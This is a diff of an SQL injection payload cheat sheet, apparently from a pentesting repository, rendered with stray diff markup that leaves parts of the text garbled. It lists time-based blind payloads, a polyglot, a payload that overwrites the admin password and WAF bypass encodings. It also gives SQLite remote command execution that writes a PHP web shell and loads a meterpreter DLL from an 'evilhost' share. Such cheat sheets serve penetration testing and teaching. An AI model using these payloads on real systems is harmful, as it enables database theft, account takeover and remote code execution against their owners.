MySQL/MariaDB : OR ELT([RANDNUM]=[RANDNUM],SLEEP([SLEEPTIME])) comment: # -- /*!30100 MySQL code*/
|
|
||||||
Oracle : AND [RANDNUM]=DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME]) comment: -- /**/
|
|
||||||
PostGreSQL : AND [RANDNUM]=(SELECT [RANDNUM] FROM PG_SLEEP([SLEEPTIME])) comment: -- /**/
|
|
||||||
PostGreSQL : AND [RANDNUM]=(SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000)) comment: -- /**/
|
|
||||||
SQL Server : IF([INFERENCE]) WAITFOR DELAY '0:0:[SLEEPTIME]' comment: --
|
|
||||||
```
|
|
||||||
|
|
||||||
## Polyglot injection (multicontext)
|
## Polyglot injection (multicontext)
|
||||||
```
|
```sql
|
||||||
SLEEP(1) /*' or SLEEP(1) or '" or SLEEP(1) or "*/
|
SLEEP(1) /*' or SLEEP(1) or '" or SLEEP(1) or "*/
|
||||||
```
|
```
|
||||||
|
|
||||||
## Insert Statement - ON DUPLICATE KEY UPDATE
|
## Insert Statement - ON DUPLICATE KEY UPDATE
|
||||||
ON DUPLICATE KEY UPDATE keywords is used to tell MySQL what to do when the application tries to insert a row that already exists in the table. We can use this to change the admin password by:
|
ON DUPLICATE KEY UPDATE keywords is used to tell MySQL what to do when the application tries to insert a row that already exists in the table. We can use this to change the admin password by:
|
||||||
```
|
```sql
|
||||||
Inject using payload:
|
Inject using payload:
|
||||||
attacker_dummy@example.com", "bcrypt_hash_of_qwerty"), ("admin@example.com", "bcrypt_hash_of_qwerty") ON DUPLICATE KEY UPDATE password="bcrypt_hash_of_qwerty" --
|
attacker_dummy@example.com", "bcrypt_hash_of_qwerty"), ("admin@example.com", "bcrypt_hash_of_qwerty") ON DUPLICATE KEY UPDATE password="bcrypt_hash_of_qwerty" --
|
||||||
|
|
||||||
@ -294,7 +294,7 @@ After this, we can simply authenticate with “admin@example.com” and the pass
|
|||||||
## WAF Bypass
|
## WAF Bypass
|
||||||
|
|
||||||
No Space (%20) - bypass using whitespace alternatives
|
No Space (%20) - bypass using whitespace alternatives
|
||||||
```
|
```sql
|
||||||
?id=1%09and%091=1%09--
|
?id=1%09and%091=1%09--
|
||||||
?id=1%0Dand%0D1=1%0D--
|
?id=1%0Dand%0D1=1%0D--
|
||||||
?id=1%0Cand%0C1=1%0C--
|
?id=1%0Cand%0C1=1%0C--
|
||||||
@ -304,31 +304,31 @@ No Space (%20) - bypass using whitespace alternatives
|
|||||||
```
|
```
|
||||||
|
|
||||||
No Whitespace - bypass using comments
|
No Whitespace - bypass using comments
|
||||||
```
|
```sql
|
||||||
?id=1/*comment*/and/**/1=1/**/--
|
?id=1/*comment*/and/**/1=1/**/--
|
||||||
```
|
```
|
||||||
|
|
||||||
No Whitespace - bypass using parenthesis
|
No Whitespace - bypass using parenthesis
|
||||||
```
|
```sql
|
||||||
?id=(1)and(1)=(1)--
|
?id=(1)and(1)=(1)--
|
||||||
```
|
```
|
||||||
|
|
||||||
No Comma - bypass using OFFSET, FROM and JOIN
|
No Comma - bypass using OFFSET, FROM and JOIN
|
||||||
```
|
```sql
|
||||||
LIMIT 0,1 -> LIMIT 1 OFFSET 0
|
LIMIT 0,1 -> LIMIT 1 OFFSET 0
|
||||||
SUBSTR('SQL',1,1) -> SUBSTR('SQL' FROM 1 FOR 1).
|
SUBSTR('SQL',1,1) -> SUBSTR('SQL' FROM 1 FOR 1).
|
||||||
SELECT 1,2,3,4 -> UNION SELECT * FROM (SELECT 1)a JOIN (SELECT 2)b JOIN (SELECT 3)c JOIN (SELECT 4)d
|
SELECT 1,2,3,4 -> UNION SELECT * FROM (SELECT 1)a JOIN (SELECT 2)b JOIN (SELECT 3)c JOIN (SELECT 4)d
|
||||||
```
|
```
|
||||||
|
|
||||||
Blacklist using keywords - bypass using uppercase/lowercase
|
Blacklist using keywords - bypass using uppercase/lowercase
|
||||||
```
|
```sql
|
||||||
?id=1 AND 1=1#
|
?id=1 AND 1=1#
|
||||||
?id=1 AnD 1=1#
|
?id=1 AnD 1=1#
|
||||||
?id=1 aNd 1=1#
|
?id=1 aNd 1=1#
|
||||||
```
|
```
|
||||||
|
|
||||||
Blacklist using keywords case insensitive - bypass using an equivalent operator
|
Blacklist using keywords case insensitive - bypass using an equivalent operator
|
||||||
```
|
```sql
|
||||||
AND -> &&
|
AND -> &&
|
||||||
OR -> ||
|
OR -> ||
|
||||||
= -> LIKE,REGEXP, not < and not >
|
= -> LIKE,REGEXP, not < and not >
|
||||||
@ -337,7 +337,7 @@ WHERE -> HAVING
|
|||||||
```
|
```
|
||||||
|
|
||||||
Information_schema.tables Alternative
|
Information_schema.tables Alternative
|
||||||
```
|
```sql
|
||||||
select * from mysql.innodb_table_stats;
|
select * from mysql.innodb_table_stats;
|
||||||
+----------------+-----------------------+---------------------+--------+----------------------+--------------------------+
|
+----------------+-----------------------+---------------------+--------+----------------------+--------------------------+
|
||||||
| database_name | table_name | last_update | n_rows | clustered_index_size | sum_of_other_index_sizes |
|
| database_name | table_name | last_update | n_rows | clustered_index_size | sum_of_other_index_sizes |
|
||||||
@ -358,7 +358,7 @@ mysql> show tables in dvwa;
|
|||||||
```
|
```
|
||||||
|
|
||||||
Version Alternative
|
Version Alternative
|
||||||
```
|
```sql
|
||||||
mysql> select @@innodb_version;
|
mysql> select @@innodb_version;
|
||||||
+------------------+
|
+------------------+
|
||||||
| @@innodb_version |
|
| @@innodb_version |
|
||||||
@ -400,6 +400,7 @@ mysql> mysql> select version();
|
|||||||
* POSTGRESQL:
|
* POSTGRESQL:
|
||||||
- [PentestMonkey's Postgres SQLi Cheatsheet] (http://pentestmonkey.net/cheat-sheet/sql-injection/postgres-sql-injection-cheat-sheet)
|
- [PentestMonkey's Postgres SQLi Cheatsheet] (http://pentestmonkey.net/cheat-sheet/sql-injection/postgres-sql-injection-cheat-sheet)
|
||||||
* Others
|
* Others
|
||||||
|
- [SQLi Cheatsheet - NetSparker](https://www.netsparker.com/blog/web-security/sql-injection-cheat-sheet/)
|
||||||
- [Access SQLi Cheatsheet] (http://nibblesec.org/files/MSAccessSQLi/MSAccessSQLi.html)
|
- [Access SQLi Cheatsheet] (http://nibblesec.org/files/MSAccessSQLi/MSAccessSQLi.html)
|
||||||
- [PentestMonkey's Ingres SQL Injection Cheat Sheet] (http://pentestmonkey.net/cheat-sheet/sql-injection/ingres-sql-injection-cheat-sheet)
|
- [PentestMonkey's Ingres SQL Injection Cheat Sheet] (http://pentestmonkey.net/cheat-sheet/sql-injection/ingres-sql-injection-cheat-sheet)
|
||||||
- [Pentestmonkey's DB2 SQL Injection Cheat Sheet] (http://pentestmonkey.net/cheat-sheet/sql-injection/db2-sql-injection-cheat-sheet)
|
- [Pentestmonkey's DB2 SQL Injection Cheat Sheet] (http://pentestmonkey.net/cheat-sheet/sql-injection/db2-sql-injection-cheat-sheet)
|
||||||
|
@ -1,50 +1,61 @@
|
|||||||
# SQLite Injection
|
# SQLite Injection
|
||||||
|
|
||||||
## SQLite version
|
## SQLite comment
|
||||||
|
```sql
|
||||||
|
--
|
||||||
|
/**/
|
||||||
```
|
```
|
||||||
|
|
||||||
|
## SQLite version
|
||||||
|
```sql
|
||||||
select sqlite_version();
|
select sqlite_version();
|
||||||
```
|
```
|
||||||
|
|
||||||
## Integer/String based - Extract table name
|
## Integer/String based - Extract table name
|
||||||
```
|
```sql
|
||||||
SELECT tbl_name FROM sqlite_master WHERE type='table' and tbl_name NOT like 'sqlite_%'
|
SELECT tbl_name FROM sqlite_master WHERE type='table' and tbl_name NOT like 'sqlite_%'
|
||||||
```
|
```
|
||||||
Use limit X+1 offset X, to extract all tables.
|
Use limit X+1 offset X, to extract all tables.
|
||||||
|
|
||||||
## Integer/String based - Extract column name
|
## Integer/String based - Extract column name
|
||||||
```
|
```sql
|
||||||
SELECT sql FROM sqlite_master WHERE type!='meta' AND sql NOT NULL AND name NOT LIKE 'sqlite_%' AND name ='table_name'
|
SELECT sql FROM sqlite_master WHERE type!='meta' AND sql NOT NULL AND name NOT LIKE 'sqlite_%' AND name ='table_name'
|
||||||
```
|
```
|
||||||
|
|
||||||
For a clean output
|
For a clean output
|
||||||
```
|
```sql
|
||||||
SELECT replace(replace(replace(replace(replace(replace(replace(replace(replace(replace(substr((substr(sql,instr(sql,'(')%2b1)),instr((substr(sql,instr(sql,'(')%2b1)),'')),"TEXT",''),"INTEGER",''),"AUTOINCREMENT",''),"PRIMARY KEY",''),"UNIQUE",''),"NUMERIC",''),"REAL",''),"BLOB",''),"NOT NULL",''),",",'~~') FROM sqlite_master WHERE type!='meta' AND sql NOT NULL AND name NOT LIKE 'sqlite_%' AND name ='table_name'
|
SELECT replace(replace(replace(replace(replace(replace(replace(replace(replace(replace(substr((substr(sql,instr(sql,'(')%2b1)),instr((substr(sql,instr(sql,'(')%2b1)),'')),"TEXT",''),"INTEGER",''),"AUTOINCREMENT",''),"PRIMARY KEY",''),"UNIQUE",''),"NUMERIC",''),"REAL",''),"BLOB",''),"NOT NULL",''),",",'~~') FROM sqlite_master WHERE type!='meta' AND sql NOT NULL AND name NOT LIKE 'sqlite_%' AND name ='table_name'
|
||||||
```
|
```
|
||||||
|
|
||||||
## Boolean - Count number of tables
|
## Boolean - Count number of tables
|
||||||
```
|
```sql
|
||||||
and (SELECT count(tbl_name) FROM sqlite_master WHERE type='table' and tbl_name NOT like 'sqlite_%' ) < number_of_table
|
and (SELECT count(tbl_name) FROM sqlite_master WHERE type='table' and tbl_name NOT like 'sqlite_%' ) < number_of_table
|
||||||
```
|
```
|
||||||
|
|
||||||
## Boolean - Enumerating table name
|
## Boolean - Enumerating table name
|
||||||
```
|
```sql
|
||||||
and (SELECT length(tbl_name) FROM sqlite_master WHERE type='table' and tbl_name not like 'sqlite_%' limit 1 offset 0)=table_name_length_number
|
and (SELECT length(tbl_name) FROM sqlite_master WHERE type='table' and tbl_name not like 'sqlite_%' limit 1 offset 0)=table_name_length_number
|
||||||
```
|
```
|
||||||
|
|
||||||
## Boolean - Extract info
|
## Boolean - Extract info
|
||||||
```
|
```sql
|
||||||
and (SELECT hex(substr(tbl_name,1,1)) FROM sqlite_master WHERE type='table' and tbl_name NOT like 'sqlite_%' limit 1 offset 0) > hex('some_char')
|
and (SELECT hex(substr(tbl_name,1,1)) FROM sqlite_master WHERE type='table' and tbl_name NOT like 'sqlite_%' limit 1 offset 0) > hex('some_char')
|
||||||
```
|
```
|
||||||
|
|
||||||
## Remote Command Execution using SQLite command - Attach Database
|
## Time based
|
||||||
|
```sql
|
||||||
|
AND [RANDNUM]=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB([SLEEPTIME]00000000/2))))
|
||||||
```
|
```
|
||||||
|
|
||||||
|
## Remote Command Execution using SQLite command - Attach Database
|
||||||
|
```sql
|
||||||
ATTACH DATABASE '/var/www/lol.php' AS lol;
|
ATTACH DATABASE '/var/www/lol.php' AS lol;
|
||||||
CREATE TABLE lol.pwn (dataz text);
|
CREATE TABLE lol.pwn (dataz text);
|
||||||
INSERT INTO lol.pwn (dataz) VALUES ('<?system($_GET['cmd']); ?>');--
|
INSERT INTO lol.pwn (dataz) VALUES ('<?system($_GET['cmd']); ?>');--
|
||||||
```
|
```
|
||||||
|
|
||||||
## Remote Command Execution using SQLite command - Load_extension
|
## Remote Command Execution using SQLite command - Load_extension
|
||||||
```
|
```sql
|
||||||
UNION SELECT 1,load_extension('\\evilhost\evilshare\meterpreter.dll','DllMain');--
|
UNION SELECT 1,load_extension('\\evilhost\evilshare\meterpreter.dll','DllMain');--
|
||||||
```
|
```
|
||||||
Note: By default this component is disabled
|
Note: By default this component is disabled
|
||||||
|